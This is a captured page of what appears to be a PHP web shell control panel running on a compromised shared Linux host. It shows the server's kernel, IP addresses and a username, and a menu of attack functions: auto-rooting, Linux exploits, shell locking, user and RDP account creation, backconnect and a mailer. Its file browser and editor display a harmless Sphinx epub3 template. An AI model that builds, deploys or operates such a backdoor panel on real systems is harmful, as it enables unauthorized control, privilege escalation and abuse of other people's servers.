Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
sphinx /
templates /
epub3 /
[ HOME SHELL ]
Name
Size
Permission
Action
container.xml
246
B
-rw-r--r--
content.opf_t
2.08
KB
-rw-r--r--
mimetype
20
B
-rw-r--r--
nav.xhtml_t
629
B
-rw-r--r--
toc.ncx_t
743
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nav.xhtml_t
{%- macro toctree(navlist) -%} <ol> {%- for nav in navlist %} <li> <a href="{{ nav.refuri }}">{{ nav.text }}</a> {%- if nav.children %} {{ toctree(nav.children)|indent(4, true) }} {%- endif %} </li> {%- endfor %} </ol> {%- endmacro -%} <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:epub="http://www.idpf.org/2007/ops" lang="{{ lang }}" xml:lang="{{ lang }}"> <head> <title>{{ toc_locale }}</title> </head> <body> <nav epub:type="toc"> <h1>{{ toc_locale }}</h1> {{ toctree(navlist)|indent(6, true) }} </nav> </body> </html>
Close